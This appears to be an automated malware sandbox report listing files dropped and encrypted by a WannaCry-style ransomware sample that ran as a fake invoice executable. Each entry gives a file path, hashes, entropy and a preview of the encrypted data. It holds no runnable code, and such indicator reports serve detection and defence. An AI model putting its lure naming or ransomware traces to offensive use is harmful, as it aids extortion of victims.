                                                          SHA-256:D40E696002855F8550199411F84122BEF79EB548B9F9D4B453E86B0FA1D99A89
                                                          SHA-512:2D264A96BFF33066593C5DFF6188FE8EF2910B61F9C4B7AD5B43E7F9B8083B2F8D4A67A542950C26426242B8AFC37E113B63C685A8E9016376780423CB35EB41
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u..X3.k.).(r..ClHA.P..mTJ<.........(....QO..$.?gs.RO._..B...._..3...2..h..<..l:H~y..s/.[{..^W.m....B.]..f..6]..LQ....k....ZWV*..?...0g.XZ...;M...:..h.T.J.2^.UM..[...O....q.u..b.m..&MdP...T.....|.A..X.......K.-......H......Nm.t...D..;B...;...... ...........*Kj.$L..6?`.v..}|T..<.....}...Q....=.4.6..........h..G.R-........:..tN...........u.v.....L....)......R.^..d_n.c...b...8.m..."rL)\..Q.,.....l..._t.*........ .P.o;dKF.F...w2B..nc..?D.....0s...H.......0.........(.U.V......(..[.cQ/.X4.k;(......$<..9.R..;..^}O..E..+..r..w..j.WB=..:#S.).....g......f.....b....\....(......g...hn..._....{/.p....R.......,.[m...,ze..H...bM]..n..6q.4.Tl.$.B..}..p@r._.......W._C...tka.YC...xV..h.........4f.......H......n..V.g..N....@.1......T....X....E~..&.^M^.......w.M..D.Ll$,P,.9!l.4.K1...0.2~]..U,.j...H.@#.@.=m].owO.}l`...;Q..y$.....,...zB.}"_.Q*z1.$.......F.o...:.u.X..a{.,..cx.....v.1fI.)..]z.J..1af(5.?..22W2.9..R.....]....9..r2.`.j

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2097432
                                                          Entropy (8bit):7.999904518981081
                                                          Encrypted:true
                                                          SSDEEP:49152:hmcI6hWlqaFrpRU4zg3G40dBCNu1VwTAI7zv/iS5NHIaQFxsqDuvwmjSPZ:hj0lqSRUB370m41VwVD//5GaQLsux
                                                          MD5:EACA3463526540A51B643E4A1CFC4B51
                                                          SHA1:4211C9BB3CC9CA950A26FF4C7DC6766B3BC97380
                                                          SHA-256:D40E696002855F8550199411F84122BEF79EB548B9F9D4B453E86B0FA1D99A89
                                                          SHA-512:2D264A96BFF33066593C5DFF6188FE8EF2910B61F9C4B7AD5B43E7F9B8083B2F8D4A67A542950C26426242B8AFC37E113B63C685A8E9016376780423CB35EB41
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u..X3.k.).(r..ClHA.P..mTJ<.........(....QO..$.?gs.RO._..B...._..3...2..h..<..l:H~y..s/.[{..^W.m....B.]..f..6]..LQ....k....ZWV*..?...0g.XZ...;M...:..h.T.J.2^.UM..[...O....q.u..b.m..&MdP...T.....|.A..X.......K.-......H......Nm.t...D..;B...;...... ...........*Kj.$L..6?`.v..}|T..<.....}...Q....=.4.6..........h..G.R-........:..tN...........u.v.....L....)......R.^..d_n.c...b...8.m..."rL)\..Q.,.....l..._t.*........ .P.o;dKF.F...w2B..nc..?D.....0s...H.......0.........(.U.V......(..[.cQ/.X4.k;(......$<..9.R..;..^}O..E..+..r..w..j.WB=..:#S.).....g......f.....b....\....(......g...hn..._....{/.p....R.......,.[m...,ze..H...bM]..n..6q.4.Tl.$.B..}..p@r._.......W._C...tka.YC...xV..h.........4f.......H......n..V.g..N....@.1......T....X....E~..&.^M^.......w.M..D.Ll$,P,.9!l.4.K1...0.2~]..U,.j...H.@#.@.=m].owO.}l`...;Q..y$.....,...zB.}"_.Q*z1.$.......F.o...:.u.X..a{.,..cx.....v.1fI.)..]z.J..1af(5.?..22W2.9..R.....]....9..r2.`.j

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.994736978354738
                                                          Encrypted:true
                                                          SSDEEP:768:oNmLTtI5kBd09/WhFGzg4UDYchRpAew8ES3JMDqFH3wIzCx:8au/eFGHUDnZAeliDCwIzE
                                                          MD5:E46BE72D3510DDDF587937614E451591
                                                          SHA1:8990EEC532C7B72181EBF62C6C7B14A0E550D3D9
                                                          SHA-256:A45B948091492F0412B592CFC47BD3C2410A2DE8DEEAC143CEB7FF448B28A6E5
                                                          SHA-512:1F0824F56E6FC2ED5E174D563E94A152DE61B4D8EC5D442B9F92D22A217D1864A847635F9C9B261CCA75FEF4224048FA0779DC6D436335DFEC3D01636823E4B2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......N.Y...J....M..X.?.....8!(3..6.g..hYwIv#..:.......0_X.....ZQ..]8..+R2..).o!.\A.:9.n.'F0?.f..6....<U..n.5...K~ /...`EC.c.s^.....~.!.=,..Z...uP.t.?...$T%}.|.f.S.<%#z...J.C.J....nl.0..@:..l.c)..Z.Hp...s...4..!.%....o..Y7.Z.b;...+.'N..o.&.#..76^}......4.......U.........^i<.Hu...y..a.dr;>I'Yl.8.WG....~=U.J./d....c.?i._?.........y.t+l.U._....S]....=q..H.......~:...+._..X... 0&..[.%...g.#YY?JA.......W.4k..E.}...op.y..W4.4-..e...."t...2s.C...Hy'.~..lo...L...rs.I......a..`h.lu...e..M.....K.L...K...1...> C;..@v.=A. *k...q+...j.@.1..Q.kav.I...(.;h.q.|...vI..........n.>j#...c.f....g.]8.=.*.a.'.x.f6..W4t.V..L........rF.i.g....7......p.[t.....&../..M..........F..{..MD.....21..Q=..b..c.<p^....[1....`..^......5.7.0..R..W.(...j..[..........<-.F......g.&*....?'.I..:..0...$.G.i...."...M.....Nlg....G-.IfO.%.JW....0g.m../... ..".3...yR...K....c....C..J.T.E.{.p...uD....m[..,V2..GE'<}..1A....>OO..7.]...b....=.:.G...Y...'Z...0..B....g..'y.~~...(...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.994736978354738
                                                          Encrypted:true
                                                          SSDEEP:768:oNmLTtI5kBd09/WhFGzg4UDYchRpAew8ES3JMDqFH3wIzCx:8au/eFGHUDnZAeliDCwIzE
                                                          MD5:E46BE72D3510DDDF587937614E451591
                                                          SHA1:8990EEC532C7B72181EBF62C6C7B14A0E550D3D9
                                                          SHA-256:A45B948091492F0412B592CFC47BD3C2410A2DE8DEEAC143CEB7FF448B28A6E5
                                                          SHA-512:1F0824F56E6FC2ED5E174D563E94A152DE61B4D8EC5D442B9F92D22A217D1864A847635F9C9B261CCA75FEF4224048FA0779DC6D436335DFEC3D01636823E4B2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......N.Y...J....M..X.?.....8!(3..6.g..hYwIv#..:.......0_X.....ZQ..]8..+R2..).o!.\A.:9.n.'F0?.f..6....<U..n.5...K~ /...`EC.c.s^.....~.!.=,..Z...uP.t.?...$T%}.|.f.S.<%#z...J.C.J....nl.0..@:..l.c)..Z.Hp...s...4..!.%....o..Y7.Z.b;...+.'N..o.&.#..76^}......4.......U.........^i<.Hu...y..a.dr;>I'Yl.8.WG....~=U.J./d....c.?i._?.........y.t+l.U._....S]....=q..H.......~:...+._..X... 0&..[.%...g.#YY?JA.......W.4k..E.}...op.y..W4.4-..e...."t...2s.C...Hy'.~..lo...L...rs.I......a..`h.lu...e..M.....K.L...K...1...> C;..@v.=A. *k...q+...j.@.1..Q.kav.I...(.;h.q.|...vI..........n.>j#...c.f....g.]8.=.*.a.'.x.f6..W4t.V..L........rF.i.g....7......p.[t.....&../..M..........F..{..MD.....21..Q=..b..c.<p^....[1....`..^......5.7.0..R..W.(...j..[..........<-.F......g.&*....?'.I..:..0...$.G.i...."...M.....Nlg....G-.IfO.%.JW....0g.m../... ..".3...yR...K....c....C..J.T.E.{.p...uD....m[..,V2..GE'<}..1A....>OO..7.]...b....=.:.G...Y...'Z...0..B....g..'y.~~...(...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.1.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.216350818732761
                                                          Encrypted:false
                                                          SSDEEP:6:bkE7DPkSMPXBltWckqEBoJxsyvhSHL1YrrGjB5xrkBKksnL6+ltzjW/Nu:bkEDMPZWcnsyv0HLorGvKBKrLME
                                                          MD5:6728B69FCA0B83F6ADA2A7083620F821
                                                          SHA1:31E2015976DC952157ECFD31BE166B91D9F02105
                                                          SHA-256:ED3A6EAEF88C743E116D0DE74A3F4CEB20DE9C6341B3406E990E05E0FE60A169
                                                          SHA-512:0786D220BF1A575ABA2D28EA08464C3517092C77D4C70445E0DA9DCF8DFA9AF3FA42B166CC695F4B67A590994A74320D661FECBD411BD0E09AC4A960D99C1A1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....\\..ZP&s..(.}..'. .c.Q<.$.i...,....]Y.n@.1.........(.c{$O.&..]..~.....;.<mj.'u3..........g.{..........A.d.D[.%...i...ah._W.....F.DU..C.-.Yp..$.lW.)bG..}..5...[.../=..f.G$J3..!K..a.........['.V..>./Pa..u^....2.yl.0....u...W.....k...<~^..2H..x...................{..(..A

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.216350818732761
                                                          Encrypted:false
                                                          SSDEEP:6:bkE7DPkSMPXBltWckqEBoJxsyvhSHL1YrrGjB5xrkBKksnL6+ltzjW/Nu:bkEDMPZWcnsyv0HLorGvKBKrLME
                                                          MD5:6728B69FCA0B83F6ADA2A7083620F821
                                                          SHA1:31E2015976DC952157ECFD31BE166B91D9F02105
                                                          SHA-256:ED3A6EAEF88C743E116D0DE74A3F4CEB20DE9C6341B3406E990E05E0FE60A169
                                                          SHA-512:0786D220BF1A575ABA2D28EA08464C3517092C77D4C70445E0DA9DCF8DFA9AF3FA42B166CC695F4B67A590994A74320D661FECBD411BD0E09AC4A960D99C1A1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....\\..ZP&s..(.}..'. .c.Q<.$.i...,....]Y.n@.1.........(.c{$O.&..]..~.....;.<mj.'u3..........g.{..........A.d.D[.%...i...ah._W.....F.DU..C.-.Yp..$.lW.)bG..}..5...[.../=..f.G$J3..!K..a.........['.V..>./Pa..u^....2.yl.0....u...W.....k...<~^..2H..x...................{..(..A

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.2.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.160278156339508
                                                          Encrypted:false
                                                          SSDEEP:6:bkEzmJgCDpzoXRPMtml7SQydAhB22VSTEdLjt2bIjMvy4tl/GrQzvFg9:bkEzmGgpz0MwhSFdAHRVSTULB2bIixtU
                                                          MD5:F69DBBE1B19B2D5CA120BAC3ECC3A052
                                                          SHA1:59230ECF67C4598692FA0C4392ABD03AD72BCA4A
                                                          SHA-256:CA935269AAE0F3E3C20CFFBA8F084E6E6FE050DEF0FCA37801492A76465BE01A
                                                          SHA-512:364F5521AA86FBF4F90703AA8EE4438AD30119FD958C60091B155E78AB30E41848FFBC8FB5D2CC03ACF692628A47DECBBF60C71A39319418ACABCABA288CCFC8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....%nU..).G]..G.....m\d...\..g.F..MA.7t...8.....3....`..V...kTA$.ri.@j...nu.f..F...z..A.b..8...j.yZ........;.8...2P....H.....#k....PM.i.M.7.x....S.mK..(..w..\...H.iL}Zz.K..U..(....R=BO..6......0...... ..q.....Y.w\]...~W)c.Q:4.-..q)...6)]..{.%.l............."P.uisR.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.160278156339508
                                                          Encrypted:false
                                                          SSDEEP:6:bkEzmJgCDpzoXRPMtml7SQydAhB22VSTEdLjt2bIjMvy4tl/GrQzvFg9:bkEzmGgpz0MwhSFdAHRVSTULB2bIixtU
                                                          MD5:F69DBBE1B19B2D5CA120BAC3ECC3A052
                                                          SHA1:59230ECF67C4598692FA0C4392ABD03AD72BCA4A
                                                          SHA-256:CA935269AAE0F3E3C20CFFBA8F084E6E6FE050DEF0FCA37801492A76465BE01A
                                                          SHA-512:364F5521AA86FBF4F90703AA8EE4438AD30119FD958C60091B155E78AB30E41848FFBC8FB5D2CC03ACF692628A47DECBBF60C71A39319418ACABCABA288CCFC8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....%nU..).G]..G.....m\d...\..g.F..MA.7t...8.....3....`..V...kTA$.ri.@j...nu.f..F...z..A.b..8...j.yZ........;.8...2P....H.....#k....PM.i.M.7.x....S.mK..(..w..\...H.iL}Zz.K..U..(....R=BO..6......0...... ..q.....Y.w\]...~W)c.Q:4.-..q)...6)]..{.%.l............."P.uisR.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.99521249558096
                                                          Encrypted:true
                                                          SSDEEP:768:cQ0oABZuOclneMH2elPQPZf24Hhyxj6F5HZzjCF:cQ7AXuieMfHHWK9jCF
                                                          MD5:1396369E726F0977615A5199305DAA5D
                                                          SHA1:8D38E3A5F8F083B191C8E00B7A5F5D7FC952E977
                                                          SHA-256:121484F731D8B48D6CDD9D1682E379C5B193D438BE3FB8700E8A0789CD59FAE4
                                                          SHA-512:C8051C51AF244E448AA1E72F03DE7C8E5328F5E899CD102DD3547C57BBE7C6644EAC6BCAF6A4068ECE97EF97911FE6D3CF059B005E95EE54930DD30C0ABB25F4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......[..z.."...m$a.....]m..&A#........E{..... @2'B..i.HXX.p..X[f}i..H6;.h....L.N...2a......T.o...Z.Qe.g..q.Z.TS..."e.R.:o|....5.k..Kgo.`.h...........K.S.x.'$.k:u0..W u..{p.....*.(>I...Ix<.........}7?.N.,a@...._.3..L..K..~Ca.q...#{..[.u......X..5.........4........;.u .pV..ci)..E.4.....!.....6..c..R..B.t..U.@..3./e..>.C...../T`0..\.NA.B.1.......O.lq........I...`.3r{DUggr.M..2....B..A..\.@.........(G...^.X...eg..c.\.uf...\.7OSj......S3...../lt.....m.dB.....8!........'.R.2...:Z.kV'....&}......I.l.zc.o=..O. h.......+.y.Koj...m.[`.sr...$.-....a....~.@`.,m3..z.G.@.7F...W+e5.Q...Zn./G....;+...g..n.@.../...p1y...C..o].O....Ec&d..v..H..R.R......P........J.9_..L........v..VV~.G.Ay.2'<.A....Jx.u_.~!.:.......<m[.....iS....b]w.r..~...p...BE1.0.....K.....Wt.....>.I%......d....*l....O...D./....d...h..?C.-..}v.e..l.....(./bi...1...@.;..*.CY.r.1-4.&).g....]q..}N.3O.q..wBV).v.&_S....9...F.r.N.>.a.D.>.~[.c.S.?..yfT.w\...........w....].1...H*....T.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.99521249558096
                                                          Encrypted:true
                                                          SSDEEP:768:cQ0oABZuOclneMH2elPQPZf24Hhyxj6F5HZzjCF:cQ7AXuieMfHHWK9jCF
                                                          MD5:1396369E726F0977615A5199305DAA5D
                                                          SHA1:8D38E3A5F8F083B191C8E00B7A5F5D7FC952E977
                                                          SHA-256:121484F731D8B48D6CDD9D1682E379C5B193D438BE3FB8700E8A0789CD59FAE4
                                                          SHA-512:C8051C51AF244E448AA1E72F03DE7C8E5328F5E899CD102DD3547C57BBE7C6644EAC6BCAF6A4068ECE97EF97911FE6D3CF059B005E95EE54930DD30C0ABB25F4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......[..z.."...m$a.....]m..&A#........E{..... @2'B..i.HXX.p..X[f}i..H6;.h....L.N...2a......T.o...Z.Qe.g..q.Z.TS..."e.R.:o|....5.k..Kgo.`.h...........K.S.x.'$.k:u0..W u..{p.....*.(>I...Ix<.........}7?.N.,a@...._.3..L..K..~Ca.q...#{..[.u......X..5.........4........;.u .pV..ci)..E.4.....!.....6..c..R..B.t..U.@..3./e..>.C...../T`0..\.NA.B.1.......O.lq........I...`.3r{DUggr.M..2....B..A..\.@.........(G...^.X...eg..c.\.uf...\.7OSj......S3...../lt.....m.dB.....8!........'.R.2...:Z.kV'....&}......I.l.zc.o=..O. h.......+.y.Koj...m.[`.sr...$.-....a....~.@`.,m3..z.G.@.7F...W+e5.Q...Zn./G....;+...g..n.@.../...p1y...C..o].O....Ec&d..v..H..R.R......P........J.9_..L........v..VV~.G.Ay.2'<.A....Jx.u_.~!.:.......<m[.....iS....b]w.r..~...p...BE1.0.....K.....Wt.....>.I%......d....*l....O...D./....d...h..?C.-..}v.e..l.....(./bi...1...@.;..*.CY.r.1-4.&).g....]q..}N.3O.q..wBV).v.&_S....9...F.r.N.>.a.D.>.~[.c.S.?..yfT.w\...........w....].1...H*....T.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.1.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.141513416653858
                                                          Encrypted:false
                                                          SSDEEP:6:bkE473+jMZc3SJ1BCE4RvtoLMFML6mC5JZtOvHrSVCfhXy/Gqn:bkE23+jWciJ1B34ltoOQC5JrILSOyOqn
                                                          MD5:463766926B4AFDE4A7FE0E33F3E96A6A
                                                          SHA1:47BF7E8A5DC53C8051A488757E003AE328B46767
                                                          SHA-256:388AF0074C97CF8B430E6F5AB6881A77BDF9FB809E5DDAA28EE3856BC268D901
                                                          SHA-512:C341E8DDEFB401F37EEF578C6020C6084405E2A7AE437E1199A9704753D780ECECB1DD49A39066BD1AFBF0F5692BC5AA42F433E31E9137279E8BA0BEE80F4AD6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........57....m...^...o..n./...N..k....x..Q#.._.e....+..W8y....l.2..A11..m.z.%..?....6`.O.......ZN..p..G3G..rS]...g3......j...w>U.."8...VgY..w...A.'..G;.3".....$........v...}...|.....Ml%...}\.....H".b."...0..\>P.N...p.S.c.^P.t.'.e.D.......A....2H...............].@:B.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.141513416653858
                                                          Encrypted:false
                                                          SSDEEP:6:bkE473+jMZc3SJ1BCE4RvtoLMFML6mC5JZtOvHrSVCfhXy/Gqn:bkE23+jWciJ1B34ltoOQC5JrILSOyOqn
                                                          MD5:463766926B4AFDE4A7FE0E33F3E96A6A
                                                          SHA1:47BF7E8A5DC53C8051A488757E003AE328B46767
                                                          SHA-256:388AF0074C97CF8B430E6F5AB6881A77BDF9FB809E5DDAA28EE3856BC268D901
                                                          SHA-512:C341E8DDEFB401F37EEF578C6020C6084405E2A7AE437E1199A9704753D780ECECB1DD49A39066BD1AFBF0F5692BC5AA42F433E31E9137279E8BA0BEE80F4AD6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........57....m...^...o..n./...N..k....x..Q#.._.e....+..W8y....l.2..A11..m.z.%..?....6`.O.......ZN..p..G3G..rS]...g3......j...w>U.."8...VgY..w...A.'..G;.3".....$........v...}...|.....Ml%...}\.....H".b."...0..\>P.N...p.S.c.^P.t.'.e.D.......A....2H...............].@:B.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.2.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.232663585543536
                                                          Encrypted:false
                                                          SSDEEP:6:bkEtSPTIx46p7gew+umcdAl1DE81YbWVh++c2dLXZQfzdq/Wz8zAw:bkEEDYw+uSjDE882dlUqsbw
                                                          MD5:3F88E474A205591212F780179BD50B06
                                                          SHA1:25C4B5878BBFB79DCEFB79B0E10A2B745A24D30D
                                                          SHA-256:0300DFEAE85DC0A89C86DA46A301A7B6B914EBEB424318F10D399FAA8C5B11DF
                                                          SHA-512:0654692A5D0A6BC4B27CA4920A305DFC4F3EAA122D577E4AB00F2A3105D2A67E0451734F240B75C985504AB7BA039C3504D99B10C60920BE5FBB0C0DE74495B1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T..S.2...A.m.{..G..M#r.:@..........wyN.h.]p.2..!.{.h...H;...`<D'^I.......9.s.s..)4z.d.8he.. C..].M..8..R...V.I.......B.mF;.<.Di..5.....Y.....m.m5.H....\..j....&|.Nt1.{.B}.i...|f1.`./..|{.4iV.Uu..nx.!........^..".... ....1U=.TG$...v.X.Eqm..I.%T3..............P_...j..gOsb.+:

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.232663585543536
                                                          Encrypted:false
                                                          SSDEEP:6:bkEtSPTIx46p7gew+umcdAl1DE81YbWVh++c2dLXZQfzdq/Wz8zAw:bkEEDYw+uSjDE882dlUqsbw
                                                          MD5:3F88E474A205591212F780179BD50B06
                                                          SHA1:25C4B5878BBFB79DCEFB79B0E10A2B745A24D30D
                                                          SHA-256:0300DFEAE85DC0A89C86DA46A301A7B6B914EBEB424318F10D399FAA8C5B11DF
                                                          SHA-512:0654692A5D0A6BC4B27CA4920A305DFC4F3EAA122D577E4AB00F2A3105D2A67E0451734F240B75C985504AB7BA039C3504D99B10C60920BE5FBB0C0DE74495B1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T..S.2...A.m.{..G..M#r.:@..........wyN.h.]p.2..!.{.h...H;...`<D'^I.......9.s.s..)4z.d.8he.. C..].M..8..R...V.I.......B.mF;.<.Di..5.....Y.....m.m5.H....\..j....&|.Nt1.{.B}.i...|f1.`./..|{.4iV.Uu..nx.!........^..".... ....1U=.TG$...v.X.Eqm..I.%T3..............P_...j..gOsb.+:

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.9943680060318005
                                                          Encrypted:true
                                                          SSDEEP:768:bBk8/urbrjab+qzk4Ly55eRlQbARa6Z6Tb6vCjPh1JJJDTdEGbQWt:bb2rDa+4TfDaq6f6vCjzJD5E4
                                                          MD5:A01D2418AB4855B7911343B21398B869
                                                          SHA1:E470DFD2E107B114146B886C1DC176A2AFA523B3
                                                          SHA-256:BABBD965E3827BBDDF3BCFACDD1653461E7DB9AABFF80BD63766392DC670E93B
                                                          SHA-512:6766B035D9F393B184A2BE649B52A9CD5E27752F71151AD963E9440DF9CF05165F19CC10D8D76E77AB48A970D14BEC4F1E299118DBE7F93C07AD8C133A41612B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........<..O4..X...3.2.....K.JUe..6S1Q....8.vI...1..!N.grP\....x.'.......%=..z.]{k.=4.....Mz..*QF...V.....s..(.k.../wDb.'S.L.{.; .=....V.....\..h...?W./"......e"..E..>.Bv...m{.....*..jmu.oU.....b......}2v..Z/B..u.|....2iL....P!5....d.h..Y>...AU....4..........g:V.]..}1+;...". ...U>.+........STP{..?\.....F.^....u4....l#bx.#w)....k..%.4.p.A......xW.s.....N..z]w..o...|...k.......m}..|2._L.V?..=.....wY....j...`.HAzD.10}...kW.'.I.b.5~BL-j...;.m.'..xY...R.s.L..v.......:7...n/.`...Y.......x.:..GH^Y#..VW.g....P..A....j.Z../Y....;j5...t......n.".23.q.}...dMR.....W.....?.....*..O.l......` 1...U.XH..d(;0.._.~s}..Z`.?M...+..........~....@&.d~Y.b..Q..lz..!2.v...G.....B....[. ..p.Y.]R8.@...y.i...3;.0.b.Z).A.....}..t*.....!..J.Y.........F....M/s.-.K...4....T.n............j..).h..lk..9..Q....9......HH..w..*.z2.....^,G....L.m.>.s.Z..... @].t.j...O*...H......l.S.\d.....H.H. Bu.....U...|/.....F.p.2..l..l...W.H..\5.q..{...N..T...0>r;..z

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.9943680060318005
                                                          Encrypted:true
                                                          SSDEEP:768:bBk8/urbrjab+qzk4Ly55eRlQbARa6Z6Tb6vCjPh1JJJDTdEGbQWt:bb2rDa+4TfDaq6f6vCjzJD5E4
                                                          MD5:A01D2418AB4855B7911343B21398B869
                                                          SHA1:E470DFD2E107B114146B886C1DC176A2AFA523B3
                                                          SHA-256:BABBD965E3827BBDDF3BCFACDD1653461E7DB9AABFF80BD63766392DC670E93B
                                                          SHA-512:6766B035D9F393B184A2BE649B52A9CD5E27752F71151AD963E9440DF9CF05165F19CC10D8D76E77AB48A970D14BEC4F1E299118DBE7F93C07AD8C133A41612B
                                                          Malicious:true
                                                          Reputation:unknown
